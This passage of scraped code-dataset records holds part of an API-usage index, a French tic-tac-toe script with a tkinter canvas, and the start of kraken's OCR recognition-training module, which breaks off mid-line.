"logutils_conversions._string_to_h2", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 72, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h3", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 74, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "logutils_conversions._table_to_string", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 82, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_framed_string", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", 
"line_number": 88, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 91, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 92, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 96, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "logutils_conversions._verbose_message_to_string", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logutils_conversions.LINE_WIDTH", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 169, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 170, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 172, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 185, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.isabs", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 214, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 223, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 224, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 239, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 243, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 266, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 286, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 
301, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 303, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 305, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 311, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 313, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 315, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 317, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 319, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 323, "usage_type": "attribute"}, {"api_name": "logging.Formatter.format", "line_number": 327, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 327, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 341, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 342, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 343, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 375, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 376, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 377, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 378, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 379, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 380, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 383, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 384, "usage_type": "attribute"}, {"api_name": "logging.WARN", 
"line_number": 385, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 386, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 387, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 388, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 389, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 390, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 391, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 392, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 393, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 394, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 390, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 390, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 398, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 399, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 404, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 405, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 406, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 407, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 408, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 409, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 410, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 411, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 415, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 416, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 417, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 418, "usage_type": 
"attribute"}, {"api_name": "colorama.Fore", "line_number": 419, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 420, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 421, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 422, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 426, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 429, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 432, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 435, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 438, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 441, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 444, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 447, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 450, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 453, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 479, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 481, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 483, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 495, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 496, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 502, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.setLoggerClass", "line_number": 513, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 526, "usage_type": "call"}]}
+{"seq_id": "380884730", "text": "'''\nDocumentation, License etc.\n\n@package projet_morpion\n'''\n\n# 1ère étape : Ecrire une fonction pour afficher le tableau de jeu. Configurer votre tableau comme une liste, où chaque index 1-9 correspond à un nombre sur un clavier, de sorte que vous obtenez un terrain de 3 par 3.\n\nfrom IPython.display import clear_output\n\ndef affiche_tableau(tableau):\n clear_output()\n print(\"Bienvenue dans le jeu du morpion : \\n\") \n print(' | |')\n print(' ' + tableau[7] + ' | ' + tableau[8] + ' | ' + tableau[9])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[4] + ' | ' + tableau[5] + ' | ' + tableau[6])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[1] + ' | ' + tableau[2] + ' | ' + tableau[3])\n print(' | |')\n\naffiche_tableau(['','X','X','X','O',' ','O','X','X','X'])\n\n# **2ème étape : Ecrire une fonction qui demande au joueur quelle marque «X» ou «O» il veut utiliser et lui assigner. Pensez à utiliser une boucle *while* pour demander une réponse au joueur jusqu'à obtenir une réponse correcte.** \n\ndef pion_joueur():\n \n marque = ''\n while not (marque == 'X' or marque == 'O'):\n marque = input('Joueur 1: Est-ce que vous voulez jouer X ou O ? ').upper()\n\n if marque == 'X':\n return ('X', 'O')\n else:\n return ('O', 'X') \n\n\n\n\n\nimport tkinter as Tk\nimport time\n\ndef affiche_canevas_tk() :\n N = 3 \n pas=600/N \n root = Tk.Tk() \n c = Tk.Canvas(root,height=600,width=600) \n listidrec=N*[[]] \n for i in range(N): \n listidrec[i]=N*[-1] \n for i in range(N): \n for j in range(N): \n listidrec[i][j] = c.create_rectangle(pas*i, pas*j, pas*(i+1), pas*(j+1), fill='#00FF00') \n \n c.pack()\n def test():\n for i in range(17,256):\n c.itemconfig(listidrec[1][1],fill='#0000'+hex(i)[2:])\n print(hex(i)[2:])\n time.sleep(0.05) \n root.update()\n \n \n b = Tk.Button(text = 'test', command= test)\n b.pack()\n root.mainloop()\n\n# affiche_canevas_tk()\n", "sub_path": "projet_morpion.py", "file_name": "projet_morpion.py", "file_ext": "py", "file_size_in_byte": 2106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "IPython.display.clear_output", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "504846289", "text": "#\n# Copyright 2015 Benjamin Kiessling\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"\nTraining loop interception helpers\n\"\"\"\nimport re\nimport torch\nimport pathlib\nimport logging\nimport warnings\nimport numpy as np\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\n\nfrom functools import partial\nfrom torch.multiprocessing import Pool\nfrom torch.optim import lr_scheduler\nfrom typing import Callable, Dict, Optional, Sequence, Union, Any, List\nfrom pytorch_lightning.callbacks import Callback, EarlyStopping\n\nfrom kraken.lib import models, vgsl, default_specs, progress\nfrom kraken.lib.xml import preparse_xml_data\nfrom kraken.lib.util import make_printable\nfrom kraken.lib.codec import PytorchCodec\nfrom kraken.lib.dataset import (ArrowIPCRecognitionDataset, BaselineSet,\n GroundTruthDataset, PolygonGTDataset,\n ImageInputTransforms, compute_error,\n collate_sequences)\nfrom kraken.lib.models import validate_hyper_parameters\nfrom kraken.lib.exceptions import KrakenInputException, KrakenEncodeException\n\nfrom torch.utils.data import DataLoader, random_split, Subset\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _star_fun(fun, kwargs):\n try:\n return fun(**kwargs)\n except FileNotFoundError as e:\n logger.warning(f'{e.strerror}: {e.filename}. 
Skipping.')\n except KrakenInputException as e:\n logger.warning(str(e))\n return None\n\n\nclass KrakenTrainer(pl.Trainer):\n def __init__(self,\n enable_progress_bar: bool = True,\n enable_summary: bool = True,\n min_epochs: int = 5,\n max_epochs: int = 100,\n pb_ignored_metrics: Sequence[str] = ('loss', 'val_metric'),\n move_metrics_to_cpu: bool = True,\n *args,\n **kwargs):\n kwargs['logger'] = False\n kwargs['enable_checkpointing'] = False\n kwargs['enable_progress_bar'] = enable_progress_bar\n kwargs['min_epochs'] = min_epochs\n kwargs['max_epochs'] = max_epochs\n kwargs['callbacks'] = ([] if 'callbacks' not in kwargs else kwargs['callbacks'])\n kwargs['move_metrics_to_cpu'] = move_metrics_to_cpu\n if not isinstance(kwargs['callbacks'], list):\n kwargs['callbacks'] = [kwargs['callbacks']]\n\n if enable_progress_bar:\n progress_bar_cb = progress.KrakenTrainProgressBar(ignored_metrics=pb_ignored_metrics)\n kwargs['callbacks'].append(progress_bar_cb)\n\n if enable_summary:\n from pytorch_lightning.callbacks import RichModelSummary\n summary_cb = RichModelSummary(max_depth=2)\n kwargs['callbacks'].append(summary_cb)\n kwargs['enable_model_summary'] = False\n\n kwargs['callbacks'].extend([KrakenSetOneChannelMode(), KrakenSaveModel()])\n super().__init__(*args, **kwargs)\n\n def fit(self, *args, **kwargs):\n with warnings.catch_warnings():\n warnings.filterwarnings(action='ignore', category=UserWarning,\n message='The dataloader,')\n super().fit(*args, **kwargs)\n\n\nclass KrakenSetOneChannelMode(Callback):\n \"\"\"\n Callback that sets the one_channel_mode of the model after the first epoch.\n \"\"\"\n def on_train_epoch_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n # fill one_channel_mode after 1 iteration over training data set\n if not trainer.sanity_checking and trainer.current_epoch == 0 and trainer.model.nn.model_type == 'recognition':\n ds = getattr(pl_module, 'train_set', None)\n if not ds and trainer.datamodule:\n ds = trainer.datamodule.train_set\n im_mode = ds.dataset.im_mode\n if im_mode in ['1', 'L']:\n logger.info(f'Setting model one_channel_mode to {im_mode}.')\n trainer.model.nn.one_channel_mode = im_mode\n\n\nclass KrakenSaveModel(Callback):\n \"\"\"\n Kraken's own serialization callback instead of pytorch's.\n \"\"\"\n def on_validation_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n if not trainer.sanity_checking:\n trainer.model.nn.hyper_params['completed_epochs'] += 1\n metric = float(trainer.logged_metrics['val_metric']) if 'val_metric' in trainer.logged_metrics else -1.0\n trainer.model.nn.user_metadata['accuracy'].append((trainer.global_step, metric))\n trainer.model.nn.user_metadata['metrics'].append((trainer.global_step, {k: float(v) for k, v in trainer.logged_metrics.items()}))\n\n logger.info('Saving to {}_{}'.format(trainer.model.output, trainer.current_epoch))\n trainer.model.nn.save_model(f'{trainer.model.output}_{trainer.current_epoch}.mlmodel')\n\n\nclass RecognitionModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict[str, Any] = None,\n output: str = 'model',\n spec: str = default_specs.RECOGNITION_SPEC,\n append: Optional[int] = None,\n model: Optional[Union[pathlib.Path, str]] = None,\n reorder: Union[bool, str] = True,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n 
binary_dataset_split: bool = False,\n num_workers: int = 1,\n load_hyper_parameters: bool = False,\n repolygonize: bool = False,\n force_binarization: bool = False,\n format_type: str = 'path',\n codec: Optional[Dict] = None,\n resize: str = 'fail'):\n \"\"\"\n A LightningModule encapsulating the training setup for a text\n recognition model.\n\n Setup parameters (load, training_data, evaluation_data, ....) are\n named, model hyperparameters (everything in\n `kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS`) are in the\n `hyper_params` argument.\n\n Args:\n hyper_params (dict): Hyperparameter dictionary containing all fields\n from\n kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS\n **kwargs: Setup parameters, i.e. CLI parameters of the train() command.\n \"\"\"\n super().__init__()\n hyper_params_ = default_specs.RECOGNITION_HYPER_PARAMS\n if model:\n logger.info(f'Loading existing model from {model} ')\n self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n if self.nn.model_type not in [None, 'recognition']:\n raise ValueError(f'Model {model} is of type {self.nn.model_type} while `recognition` is expected.')\n\n if load_hyper_parameters:\n hp = self.nn.hyper_params\n else:\n hp = {}\n hyper_params_.update(hp)\n else:\n self.nn = None\n\n if hyper_params:\n hyper_params_.update(hyper_params)\n self.save_hyperparameters(hyper_params_)\n\n self.reorder = reorder\n self.append = append\n self.model = model\n self.num_workers = num_workers\n self.resize = resize\n self.format_type = format_type\n self.output = output\n\n self.best_epoch = 0\n self.best_metric = 0.0\n\n DatasetClass = GroundTruthDataset\n valid_norm = True\n if format_type in ['xml', 'page', 'alto']:\n logger.info(f'Parsing {len(training_data)} XML files for training data')\n training_data = preparse_xml_data(training_data, format_type, repolygonize)\n if evaluation_data:\n logger.info(f'Parsing {len(evaluation_data)} XML files for validation data')\n evaluation_data = preparse_xml_data(evaluation_data, format_type, repolygonize)\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n DatasetClass = PolygonGTDataset\n valid_norm = False\n elif format_type == 'binary':\n DatasetClass = ArrowIPCRecognitionDataset\n if repolygonize:\n logger.warning('Repolygonization enabled in `binary` mode. Will be ignored.')\n valid_norm = False\n logger.info(f'Got {len(training_data)} binary dataset files for training data')\n training_data = [{'file': file} for file in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} binary dataset files for validation data')\n evaluation_data = [{'file': file} for file in evaluation_data]\n elif format_type == 'path':\n if force_binarization:\n logger.warning('Forced binarization enabled in `path` mode. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled in `path` mode. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. 
Will be ignored.')\n binary_dataset_split = False\n logger.info(f'Got {len(training_data)} line strip images for training data')\n training_data = [{'image': im} for im in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} line strip images for validation data')\n evaluation_data = [{'image': im} for im in evaluation_data]\n valid_norm = True\n # format_type is None. Determine training type from length of training data entry\n elif not format_type:\n if len(training_data[0]) >= 4:\n DatasetClass = PolygonGTDataset\n valid_norm = False\n else:\n if force_binarization:\n logger.warning('Forced binarization enabled with box lines. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled with box lines. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n else:\n raise ValueError(f'format_type {format_type} not in [alto, page, xml, path, binary].')\n\n spec = spec.strip()\n if spec[0] != '[' or spec[-1] != ']':\n raise ValueError(f'VGSL spec {spec} not bracketed')\n self.spec = spec\n # preparse input sizes from vgsl string to seed ground truth data set\n # sizes and dimension ordering.\n if not self.nn:\n blocks = spec[1:-1].split(' ')\n m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n if not m:\n raise ValueError(f'Invalid input spec {blocks[0]}')\n batch, height, width, channels = [int(x) for x in m.groups()]\n else:\n batch, channels, height, width = self.nn.input\n\n self.transforms = ImageInputTransforms(batch,\n height,\n width,\n channels,\n self.hparams.pad,\n valid_norm,\n force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 32,\n width if width else 400)\n\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if evaluation_data:\n train_set = self._build_dataset(DatasetClass, training_data)\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, evaluation_data)\n self.val_set = Subset(val_set, range(len(val_set)))\n elif binary_dataset_split:\n train_set = self._build_dataset(DatasetClass, training_data, split_filter='train')\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, training_data, split_filter='validation')\n self.val_set = Subset(val_set, range(len(val_set)))\n logger.info(f'Found {len(self.train_set)} (train) / {len(self.val_set)} (val) samples in pre-encoded dataset')\n else:\n train_set = self._build_dataset(DatasetClass, training_data)\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set. (Will disable alphabet mismatch detection.)')\n self.train_set, self.val_set = random_split(train_set, (train_len, val_len))\n\n if len(self.train_set) == 0 or len(self.val_set) == 0:\n raise ValueError('No valid training data was provided to the train '\n 'command. 
Please add valid XML, line, or binary data.')\n\n logger.info(f'Training set {len(self.train_set)} lines, validation set '\n f'{len(self.val_set)} lines, alphabet {len(train_set.alphabet)} '\n 'symbols')\n alpha_diff_only_train = set(self.train_set.dataset.alphabet).difference(set(self.val_set.dataset.alphabet))\n alpha_diff_only_val = set(self.val_set.dataset.alphabet).difference(set(self.train_set.dataset.alphabet))\n if alpha_diff_only_train:\n logger.warning(f'alphabet mismatch: chars in training set only: '\n f'{alpha_diff_only_train} (not included in accuracy test '\n 'during training)')\n if alpha_diff_only_val:\n logger.warning(f'alphabet mismatch: chars in validation set only: {alpha_diff_only_val} (not trained)')\n logger.info('grapheme\\tcount')\n for k, v in sorted(train_set.alphabet.items(), key=lambda x: x[1], reverse=True):\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n\n if codec:\n logger.info('Instantiating codec')\n self.codec = PytorchCodec(codec)\n for k, v in self.codec.c2l.items():\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n else:\n self.codec = None\n\n logger.info('Encoding training set')\n\n def _build_dataset(self,\n DatasetClass,\n training_data,\n **kwargs):\n dataset = DatasetClass(normalization=self.hparams.normalization,\n whitespace_normalization=self.hparams.normalize_whitespace,\n reorder=self.reorder,\n im_transforms=self.transforms,\n augmentation=self.hparams.augment,\n **kwargs)\n\n if (self.num_workers and self.num_workers > 1) and self.format_type != 'binary':\n with Pool(processes=self.num_workers) as pool:\n for im in pool.imap_unordered(partial(_star_fun, dataset.parse), training_data, 5):\n logger.debug(f'Adding sample {im} to training set')\n if im:\n dataset.add(**im)\n else:\n for im in training_data:\n try:\n dataset.add(**im)\n except KrakenInputException as e:\n logger.warning(str(e))\n if self.format_type == 'binary' and self.hparams.normalization:\n logger.debug('Rebuilding dataset using unicode normalization')\n dataset.rebuild_alphabet()\n return dataset\n\n def forward(self, x, seq_lens=None):\n return self.net(x, seq_lens)\n\n def training_step(self, batch, batch_idx):\n input, target = batch['image'], batch['target']\n # sequence batch\n if 'seq_lens' in batch:\n seq_lens, label_lens = batch['seq_lens'], batch['target_lens']\n target = (target, label_lens)\n o = self.net(input, seq_lens)\n else:\n o = self.net(input)\n\n seq_lens = o[1]\n output = o[0]\n target_lens = target[1]\n target = target[0]\n # height should be 1 by now\n if output.size(2) != 1:\n raise KrakenInputException('Expected dimension 3 to be 1, actual {}'.format(output.size(2)))\n output = output.squeeze(2)\n # NCW -> WNC\n loss = self.nn.criterion(output.permute(2, 0, 1), # type: ignore\n target,\n seq_lens,\n target_lens)\n return loss\n\n def validation_step(self, batch, batch_idx):\n chars, error = compute_error(self.rec_nn, batch)\n chars = torch.tensor(chars)\n error = torch.tensor(error)\n return {'chars': chars, 'error': error}\n\n def validation_epoch_end(self, outputs):\n chars = torch.stack([x['chars'] for x in outputs]).sum()\n error = torch.stack([x['error'] for x in outputs]).sum()\n accuracy = (chars - error) / (chars + torch.finfo(torch.float).eps)\n if accuracy > self.best_metric:\n logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {accuracy} ({self.current_epoch})')\n self.best_epoch = self.current_epoch\n 
self.best_metric = accuracy\n logger.info(f'validation run: total chars {chars} errors {error} accuracy {accuracy}')\n self.log_dict({'val_accuracy': accuracy, 'val_metric': accuracy}, prog_bar=True)\n\n def setup(self, stage: Optional[str] = None):\n # finalize models in case of appending/loading\n if stage in [None, 'fit']:\n if self.append:\n self.train_set.dataset.encode(self.codec)\n # now we can create a new model\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n logger.info(f'Appending {self.spec} to existing model {self.nn.spec} after {self.append}')\n self.nn.append(self.append, self.spec)\n self.nn.add_codec(self.train_set.dataset.codec)\n logger.info(f'Assembled model spec: {self.nn.spec}')\n elif self.model:\n self.spec = self.nn.spec\n\n # prefer explicitly given codec over network codec if mode is 'both'\n codec = self.codec if (self.codec and self.resize == 'both') else self.nn.codec\n\n codec.strict = True\n\n try:\n self.train_set.dataset.encode(codec)\n except KrakenEncodeException:\n alpha_diff = set(self.train_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n alpha_diff_val = set(self.val_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n if self.resize == 'fail':\n raise KrakenInputException(f'Training data and model codec alphabets mismatch: {alpha_diff}')\n elif self.resize == 'add':\n logger.info(f'Resizing codec to include '\n 